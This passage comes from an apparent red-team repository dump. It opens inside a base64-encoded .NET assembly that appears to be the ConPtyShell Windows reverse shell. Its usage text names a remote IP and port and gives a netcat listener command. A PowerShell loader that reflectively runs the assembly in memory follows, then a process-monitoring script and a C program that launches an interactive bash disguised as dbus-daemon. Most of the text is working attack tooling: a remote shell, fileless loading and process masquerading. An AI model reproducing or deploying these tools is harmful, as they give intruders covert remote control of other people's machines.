cml0dGVuAHNpemUAaElucHV0AGhPdXRwdXQAcGhQQwBoUEMAaENvbnNvbGVIYW5kbGUAbW9kZQBoYW5kbGUAbHBNb2R1bGVOYW1lAGhNb2R1bGUAcHJvY05hbWUAcmVtb3RlSXAAcmVtb3RlUG9ydABzaGVsbFNvY2tldAByb3dzAGNvbHMASW5wdXRQaXBlUmVhZABJbnB1dFBpcGVXcml0ZQBPdXRwdXRQaXBlUmVhZABPdXRwdXRQaXBlV3JpdGUAaGFuZGxlUHNldWRvQ29uc29sZQBDb25QdHlJbnB1dFBpcGVSZWFkAENvblB0eU91dHB1dFBpcGVXcml0ZQBhdHRyaWJ1dGVzAHNJbmZvRXgAY29tbWFuZExpbmUAdGhyZWFkUGFyYW1zAGhDaGlsZFByb2Nlc3MAcGFyYW0AYXJndW1lbnRzAGlwU3RyaW5nAGFyZwBhcmdzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBEbGxJbXBvcnRBdHRyaWJ1dGUAa2VybmVsMzIuZGxsAGtlcm5lbDMyAFN5c3RlbS5OZXQASVBBZGRyZXNzAFBhcnNlAElQRW5kUG9pbnQARW5kUG9pbnQAQWRkcmVzc0ZhbWlseQBnZXRfQWRkcmVzc0ZhbWlseQBTb2NrZXRUeXBlAFByb3RvY29sVHlwZQBDb25uZWN0AGdldF9Db25uZWN0ZWQAU3lzdGVtLlRleHQARW5jb2RpbmcAZ2V0X0FTQ0lJAEdldEJ5dGVzAFNlbmQAU2xlZXAAZ2V0X0F2YWlsYWJsZQBCeXRlAFJlY2VpdmUAR2V0U3RyaW5nAENoYXIAU3RyaW5nAFNwbGl0AFRyaW0ASW50MzIAVHJ5UGFyc2UATWFyc2hhbABTaXplT2YASW50UHRyAFplcm8ASW52YWxpZE9wZXJhdGlvbkV4Y2VwdGlvbgBvcF9FcXVhbGl0eQBHZXRMYXN0V2luMzJFcnJvcgBDb25jYXQAQWxsb2NIR2xvYmFsAGdldF9TaXplAG9wX0V4cGxpY2l0AFNvY2tldEZsYWdzAFBhcmFtZXRlcml6ZWRUaHJlYWRTdGFydABTdGFydABUb1N0cmluZwBGb3JtYXQAQ29uc29sZQBXcml0ZUxpbmUAb3BfSW5lcXVhbGl0eQBBYm9ydABTb2NrZXRTaHV0ZG93bgBTaHV0ZG93bgBDbG9zZQBTdHJ1Y3RMYXlvdXRBdHRyaWJ1dGUATGF5b3V0S2luZABTeXN0ZW0uSU8AVGV4dFdyaXRlcgBnZXRfT3V0AFdyaXRlAEVudmlyb25tZW50AEV4aXQALmNjdG9yAAAAAEENAAoAQwBvAG4AUAB0AHkAUwBoAGUAbABsACAALQAgAEAAcwBwAGwAaQBuAHQAZQByAF8AYwBvAGQAZQANAAoAAT1DAG8AdQBsAGQAIABuAG8AdAAgAGMAcgBlAGEAdABlACAAdABoAGUAIABJAG4AcAB1AHQAUABpAHAAZQAAP0MAbwB1AGwAZAAgAG4AbwB0ACAAYwByAGUAYQB0AGUAIAB0AGgAZQAgAE8AdQB0AHAAdQB0AFAAaQBwAGUAAA9DAE8ATgBPAFUAVAAkAAANQwBPAE4ASQBOACQAADVDAG8AdQBsAGQAIABuAG8AdAAgAGcAZQB0ACAAYwBvAG4AcwBvAGwAZQAgAG0AbwBkAGUAAFlDAG8AdQBsAGQAIABuAG8AdAAgAGUAbgBhAGIAbABlACAAdgBpAHIAdAB1AGEAbAAgAHQAZQByAG0AaQBuAGEAbAAgAHAAcgBvAGMAZQBzAHMAaQBuAGcAAICBQwBvAHUAbABkACAAbgBvAHQAIABjAGEAbABjAHUAbABhAHQAZQAgAHQAaABlACAAbgB1AG0AYgBlAHIAIABvAGYAIABiAHkAdABlAHMAIABmAG8AcgAgAHQAaABlACAAYQB0AHQAcgBpAGIAdQB0AGUAIABsAGkAcwB0AC4AIAAAQ0MAbwB1AGwAZAAgAG4AbwB0ACAAcwBlAHQAIAB1AHAAIABhAHQAdAByAGkAYgB1AHQAZQAgAGwAaQBzAHQALgAgAABdQwBvAHUAbABkACAAbgBvAHQAIABzAGUAdAAgAHAAcwBlAHUAZABvAGMAbwBuAHMAbwBsAGUAIAB0AGgAcgBlAGEAZAAgAGEAdAB0AHIAaQBiAHUAdABlAC4AIAAANUMAbwB1AGwAZAAgAG4AbwB0ACAAYwByAGUAYQB0AGUAIABwAHIAbwBjAGUAcwBzAC4AIAAAAQBVewAwAH0AQwBvAHUAbABkACAAbgBvAHQAIABjAG8AbgBuAGUAYwB0ACAAdABvACAAaQBwACAAewAxAH0AIABvAG4AIABwAG8AcgB0ACAAewAyAH0AADl7AHsAewBDAG8AbgBQAHQAeQBTAGgAZQBsAGwARQB4AGMAZQBwAHQAaQBvAG4AfQB9AH0ADQAKAAARawBlAHIAbgBlAGwAMwAyAAAnQwByAGUAYQB0AGUAUABzAGUAdQBkAG8AQwBvAG4AcwBvAGwAZQAAgK8NAAoAQwByAGUAYQB0AGUAUABzAGUAdQBkAG8AQwBvAG4AcwBvAGwAZQAgAGYAdQBuAGMAdABpAG8AbgAgAG4AbwB0ACAAZgBvAHUAbgBkACEAIABTAHAAYQB3AG4AaQBuAGcAIABhACAAbgBlAHQAYwBhAHQALQBsAGkAawBlACAAaQBuAHQAZQByAGEAYwB0AGkAdgBlACAAcwBoAGUAbABsAC4ALgAuAA0ACgABgJsNAAoAQwByAGUAYQB0AGUAUABzAGUAdQBkAG8AQwBvAG4AcwBvAGwAZQAgAGYAdQBuAGMAdABpAG8AbgAgAGYAbwB1AG4AZAAhACAAUwBwAGEAdwBuAGkAbgBnACAAYQAgAGYAdQBsAGwAeQAgAGkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAHMAaABlAGwAbAAuAC4ALgANAAoAAGV7ADAAfQBDAG8AdQBsAGQAIABuAG8AdAAgAGMAcgBlAGEAdABlACAAcABzAHUAZQBkAG8AIABjAG8AbgBzAG8AbABlAC4AIABFAHIAcgBvAHIAIABDAG8AZABlACAAewAxAH0AADlDAG8AbgBQAHQAeQBTAGgAZQBsAGwAIABrAGkAbgBkAGwAeQAgAGUAeABpAHQAZQBkAC4ADQAKAAAFLQBoAAENLQAtAGgAZQBsAHAAAQUvAD8AAIC5DQAKAEMAbwBuAFAAdAB5AFMAaABlAGwAbAA6ACAATgBvAHQAIABlAG4AbwB1AGcAaAAgAGEAcgBnAHUAbQBlAG4AdABzAC4AIAAyACAAQQByAGcAdQBtAGUAbgB0AHMAIAByAGUAcQB1AGkAcgBlAGQALgAgAFUAcwBlACAALQAtAGgAZQBsAHAAIABmAG8AcgAgAGEAZABkAGkAdABpAG8AbgBhAGwAIABoAGUAbABwAC4ADQAKAAFXDQAKAEMAbwBuAFAAdAB5AFMAaABlAGwAbAA6ACAASQBuAHYAYQBsAGkAZAAgAHIAZQBtAG8AdABlAEkAcAAgAHYAYQBsAHUAZQAgAHsAMAB9AA0ACgAAVQ0ACgBDAG8AbgBQAHQAeQBTAGgAZQBsAGwAOgAgAEkAbgB2AGEAbABpAGQAIABpAG4AdABlAGcAZQByACAAdgBhAGwAdQBlACAAewAwAH0ADQAKAAAdcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlAACNpQ0ACgANAAoAQwBvAG4AUAB0AHkAUwBoAGUAbABsACAALQAgAEYAdQBsAGwAeQAgAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAFIAZQB2AGUAcgBzAGUAIABTAGgAZQBsAGwAIABmAG8AcgAgAFcAaQBuAGQAbwB3AHMAIAANAAoAQQB1AHQAaABvAHIAOgAgAHMAcABsAGkAbgB0AGUAcgBfAGMAbwBkAGUADQAKAEwAaQBjAGUAbgBzAGUAOgAgAE0ASQBUAA0ACgBTAG8AdQByAGMAZQA6ACAAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBhAG4AdABvAG4AaQBvAEMAbwBjAG8ALwBDAG8AbgBQAHQAeQBTAGgAZQBsAGwADQAKACAAIAAgACAADQAKAEMAbwBuAFAAdAB5AFMAaABlAGwAbAAgAC0AIABGAHUAbABsAHkAIABpAG4AdABlAHIAYQBjAHQAaQB2AGUAIAByAGUAdgBlAHIAcwBlACAAcwBoAGUAbABsACAAZgBvAHIAIABXAGkAbgBkAG8AdwBzAA0ACgANAAoAUAByAG8AcABlAHIAbAB5ACAAcwBlAHQAIAB0AGgAZQAgAHIAbwB3AHMAIABhAG4AZAAgAGMAbwBsAHMAIAB2AGEAbAB1AGUAcwAuACAAWQBvAHUAIABjAGEAbgAgAHIAZQB0AHIAaQBlAHYAZQAgAGkAdAAgAGYAcgBvAG0ADQAKAHkAbwB1AHIAIAB0AGUAcgBtAGkAbgBhAGwAIAB3AGkAdABoACAAdABoAGUAIABjAG8AbQBtAGEAbgBkACAAIgBzAHQAdAB5ACAAcwBpAHoAZQAiAC4ADQAKAA0ACgBZAG8AdQAgAGMAYQBuACAAYQB2AG8AaQBkACAAdABvACAAcwBlAHQAIAByAG8AdwBzACAAYQBuAGQAIABjAG8AbABzACAAdgBhAGwAdQBlAHMAIABpAGYAIAB5AG8AdQAgAHIAdQBuACAAeQBvAHUAcgAgAGwAaQBzAHQAZQBuAGUAcgANAAoAdwBpAHQAaAAgAHQAaABlACAAZgBvAGwAbABvAHcAaQBuAGcAIABjAG8AbQBtAGEAbgBkADoADQAKACAAIAAgACAAcwB0AHQAeQAgAHIAYQB3ACAALQBlAGMAaABvADsAIAAoAHMAdAB0AHkAIABzAGkAegBlADsAIABjAGEAdAApACAAfAAgAG4AYwAgAC0AbAB2AG4AcAAgADMAMAAwADEADQAKAA0ACgBJAGYAIAB5AG8AdQAgAHcAYQBuAHQAIAB0AG8AIABjAGgAYQBuAGcAZQAgAHQAaABlACAAYwBvAG4AcwBvAGwAZQAgAHMAaQB6AGUAIABkAGkAcgBlAGMAdABsAHkAIABmAHIAbwBtACAAcABvAHcAZQByAHMAaABlAGwAbAANAAoAeQBvAHUAIABjAGEAbgAgAHAAYQBzAHQAZQAgAHQAaABlACAAZgBvAGwAbABvAHcAaQBuAGcAIABjAG8AbQBtAGEAbgBkAHMAOgANAAoAIAAgACAAIAAkAHcAaQBkAHQAaAA9ADgAMAANAAoAIAAgACAAIAAkAGgAZQBpAGcAaAB0AD0AMgA0AA0ACgAgACAAIAAgACQASABvAHMAdAAuAFUASQAuAFIAYQB3AFUASQAuAEIAdQBmAGYAZQByAFMAaQB6AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4ASABvAHMAdAAuAFMAaQB6AGUAIAAoACQAdwBpAGQAdABoACwAIAAkAGgAZQBpAGcAaAB0ACkADQAKACAAIAAgACAAJABIAG8AcwB0AC4AVQBJAC4AUgBhAHcAVQBJAC4AVwBpAG4AZABvAHcAUwBpAHoAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4ASABvAHMAdAAuAFMAaQB6AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAKAAkAHcAaQBkAHQAaAAsACAAJABoAGUAaQBnAGgAdAApAA0ACgANAAoAVQBzAGEAZwBlADoADQAKACAAIAAgACAAQwBvAG4AUAB0AHkAUwBoAGUAbABsAC4AZQB4AGUAIAByAGUAbQBvAHQAZQBfAGkAcAAgAHIAZQBtAG8AdABlAF8AcABvAHIAdAAgAFsAcgBvAHcAcwBdACAAWwBjAG8AbABzAF0AIABbAGMAbwBtAG0AYQBuAGQAbABpAG4AZQBdAA0ACgANAAoAUABvAHMAaQB0AGkAbwBuAGEAbAAgAGEAcgBnAHUAbQBlAG4AdABzADoADQAKACAAIAAgACAAcgBlAG0AbwB0AGUAXwBpAHAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAVABoAGUAIAByAGUAbQBvAHQAZQAgAGkAcAAgAHQAbwAgAGMAbwBuAG4AZQBjAHQADQAKACAAIAAgACAAcgBlAG0AbwB0AGUAXwBwAG8AcgB0ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAVABoAGUAIAByAGUAbQBvAHQAZQAgAHAAbwByAHQAIAB0AG8AIABjAG8AbgBuAGUAYwB0AA0ACgAgACAAIAAgAFsAcgBvAHcAcwBdACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAbwB3AHMAIABzAGkAegBlACAAZgBvAHIAIAB0AGgAZQAgAGMAbwBuAHMAbwBsAGUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAARABlAGYAYQB1AGwAdAA6ACAAIgAyADQAIgANAAoAIAAgACAAIABbAGMAbwBsAHMAXQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABDAG8AbABzACAAcwBpAHoAZQAgAGYAbwByACAAdABoAGUAIABjAG8AbgBzAG8AbABlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEQAZQBmAGEAdQBsAHQAOgAgACIAOAAwACIADQAKACAAIAAgACAAWwBjAG8AbQBtAGEAbgBkAGwAaQBuAGUAXQAgACAAIAAgACAAIAAgACAAIAAgACAAVABoAGUAIABjAG8AbQBtAGEAbgBkAGwAaQBuAGUAIABvAGYAIAB0AGgAZQAgAHAAcgBvAGMAZQBzAHMAIAB0AGgAYQB0ACAAeQBvAHUAIABhAHIAZQAgAGcAbwBpAG4AZwAgAHQAbwAgAGkAbgB0AGUAcgBhAGMAdAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABEAGUAZgBhAHUAbAB0ADoAIAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgBFAHgAYQBtAHAAbABlAHMAOgANAAoAIAAgACAAIABTAHAAYQB3AG4AIABhACAAcgBlAHYAZQByAHMAZQAgAHMAaABlAGwAbAANAAoAIAAgACAAIAAgACAAIAAgAEMAbwBuAFAAdAB5AFMAaABlAGwAbAAuAGUAeABlACAAMQAwAC4AMAAuADAALgAyACAAMwAwADAAMQANAAoAIAAgACAAIAANAAoAIAAgACAAIABTAHAAYQB3AG4AIABhACAAcgBlAHYAZQByAHMAZQAgAHMAaABlAGwAbAAgAHcAaQB0AGgAIABzAHAAZQBjAGkAZgBpAGMAIAByAG8AdwBzACAAYQBuAGQAIABjAG8AbABzACAAcwBpAHoAZQANAAoAIAAgACAAIAAgACAAIAAgAEMAbwBuAFAAdAB5AFMAaABlAGwAbAAuAGUAeABlACAAMQAwAC4AMAAuADAALgAyACAAMwAwADAAMQAgADMAMAAgADkAMAANAAoAIAAgACAAIAANAAoAIAAgACAAIABTAHAAYQB3AG4AIABhACAAcgBlAHYAZQByAHMAZQAgAHMAaABlAGwAbAAgACgAYwBtAGQALgBlAHgAZQApACAAdwBpAHQAaAAgAHMAcABlAGMAaQBmAGkAYwAgAHIAbwB3AHMAIABhAG4AZAAgAGMAbwBsAHMAIABzAGkAegBlAA0ACgAgACAAIAAgACAAIAAgACAAQwBvAG4AUAB0AHkAUwBoAGUAbABsAC4AZQB4AGUAIAAxADAALgAwAC4AMAAuADIAIAAzADAAMAAxACAAMwAwACAAOQAwACAAYwBtAGQALgBlAHgAZQANAAoADQAKAAHBzUVVnPMWTJ8eqZhoqFZFAAi3elxWGTTgiQIGDjh7AHsAewBDAG8AbgBQAHQAeQBTAGgAZQBsAGwARQB4AGMAZQBwAHQAaQBvAG4AfQB9AH0ADQAKAAIGCQQEAAAABAgAAAAEFgACAAQAAAgABAAAAAgCBggEAAEAAAT/////BAAAAIAEAAAAQAQBAAAABAIAAAAEgAAAAAQDAAAABPb///8E9f///wT0////CAAEAhgICBAYCgAHAhgJGBgYGBgVAAoCDg4QERgQERgCCRgOEBEMEBEUEQAKAg4OGBgCCRgOEBEQEBEUBQACAhgJBQACCRgJBQACAggYBAABGAgEAAECGAoABAIQGBAYERgICgAHGA4JCRgJCRgKAAUCGB0FCRAJGAoABQgRHBgYCRAYBAABCBgGAAICGBAJBAABGA4FAAIYGA4GAAISDQ4ICQADARINEAkQCQsABAEQGBAYEBgQGAMAAAELAAUIEBgQGBAYCQkGAAIRDBgYCAACERQQEQwOBgACERQYDgQAAQEcBwACEhEYEg0IAAMSERgSDRgIAAUODggJCQ4DBhEQAgYYAgYGBAABAg4FAAEBHQ4EAAEODgQAAQgOBQABCR0OBQABDh0OAyAAAQUgAQERGQECBCABAQgEIAEBDgUAARIxDgYgAgESMQgEIAARPQkgAwERPRFBEUUFIAEBEjkDIAACBAAAEkkFIAEdBQ4FIAEIHQUMBwUSDRIxEjUSDR0FBAABAQgDIAAIByADDh0FCAgGIAEdDh0DAyAADgYAAgIOEAgOBwkdBQgICA4ODh0DHQMEEAEACAQKAREYBwcDCBEYERgEBwIYGAQHAgkYBQcCCBEcBQACAhgYAwAACAUAAg4cHAQKAREMBAABGBgGBwMYAhEMDgcHERQIERgRGAIRGBEYBAABGAoGBwIRDBEUAh0cCCADCB0FCBFpDQcIHRwYEg0JHQUCCAkFIAIBHBgFIAEBEm0EIAEBHAYHAh0cEhEOBwkdHBgSDRgJHQUCCAkHAAQODhwcHAUAAg4ODgQAAQEOBhABAQgeAAQKAREQBgADDg4cHAUgAQERdRMHDA4SDRgYGBgYERQREAgSERIRBSABARF9BQACAg4OBQAAEoCBBwACAg4QEjEFIAIBDhwEBwESMQMHAQgDBwEJAwcBDggHBg4OCAkJDggBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEAALxaAAAAAAAAAAAAAN5aAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQWgAAAAAAAAAAAAAAAAAAAAAAAAAAX0NvckV4ZU1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAEAAAACAAAIAYAAAAOAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAUAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAaAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAkAAAAKBgAABUAgAAAAAAAAAAAAD4YgAA6gEAAAAAAAAAAAAAVAI0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAAAAAAAAAAAAAAAAAAAAD8AAAAAAAAABAAAAAEAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBLQBAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAJABAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAwAC4AMAAuADAALgAwAAAAQAAQAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABDAG8AbgBQAHQAeQBTAGgAZQBsAGwALgBlAHgAZQAAACgAAgABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAACAAAABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBvAG4AUAB0AHkAUwBoAGUAbABsAC4AZQB4AGUAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADAALgAwAC4AMAAuADAAAAAAAAAA77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/Pg0KPGFzc2VtYmx5IHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MSIgbWFuaWZlc3RWZXJzaW9uPSIxLjAiPg0KICA8YXNzZW1ibHlJZGVudGl0eSB2ZXJzaW9uPSIxLjAuMC4wIiBuYW1lPSJNeUFwcGxpY2F0aW9uLmFwcCIvPg0KICA8dHJ1c3RJbmZvIHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MiI+DQogICAgPHNlY3VyaXR5Pg0KICAgICAgPHJlcXVlc3RlZFByaXZpbGVnZXMgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYzIj4NCiAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIGxldmVsPSJhc0ludm9rZXIiIHVpQWNjZXNzPSJmYWxzZSIvPg0KICAgICAgPC9yZXF1ZXN0ZWRQcml2aWxlZ2VzPg0KICAgIDwvc2VjdXJpdHk+DQogIDwvdHJ1c3RJbmZvPg0KPC9hc3NlbWJseT4NCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAADAAAAPA6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==" 90 | $ConPtyShellBytes = [System.Convert]::FromBase64String($ConPtyShellBase64) 91 | [Reflection.Assembly]::Load($ConPtyShellBytes) | Out-Null 92 | $output = [ConPtyShellMainClass]::ConPtyShellMain($parametersConPtyShell) 93 | Write-Output $output 94 | } 95 | -------------------------------------------------------------------------------- /situational-awareness/procmon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | IFS=$'\n' 4 | 5 | old_process=$(ps -eo command) 6 | 7 | while true; do 8 | new_process=$(ps -eo command) 9 | diff <(echo "$old_process") <(echo "$new_process") 10 | sleep 1 11 | old_process=$new_process 12 | done 13 | -------------------------------------------------------------------------------- /stealth/fake-argv/Makefile: -------------------------------------------------------------------------------- 1 | fake : fake.o 2 | cc -o fake fake.o 3 | 4 | fake.o : 5 | cc -o fake.o -c bash-fake-argv.c 6 | 7 | clean : 8 | rm -f fake fake.o 9 | -------------------------------------------------------------------------------- /stealth/fake-argv/bash-fake-argv.c: -------------------------------------------------------------------------------- 1 | /* #include needed to use pid_t, etc. */ 2 | /* #include needed to use wait() */ 3 | #include 4 | #include 5 | #include 6 | #include /* LINUX constants and functions (fork(), etc.) */ 7 | 8 | int main(int argc, char* argv[]) { 9 | execlp("/bin/bash", "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "--norc", "--noprofile", "-i", NULL); 10 | exit(127); 11 | } 12 | -------------------------------------------------------------------------------- /stealth/fake-argv/fake: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nkeys/redteam/d8ad2009a354d466e11fda6074dd4610f82089ee/stealth/fake-argv/fake --------------------------------------------------------------------------------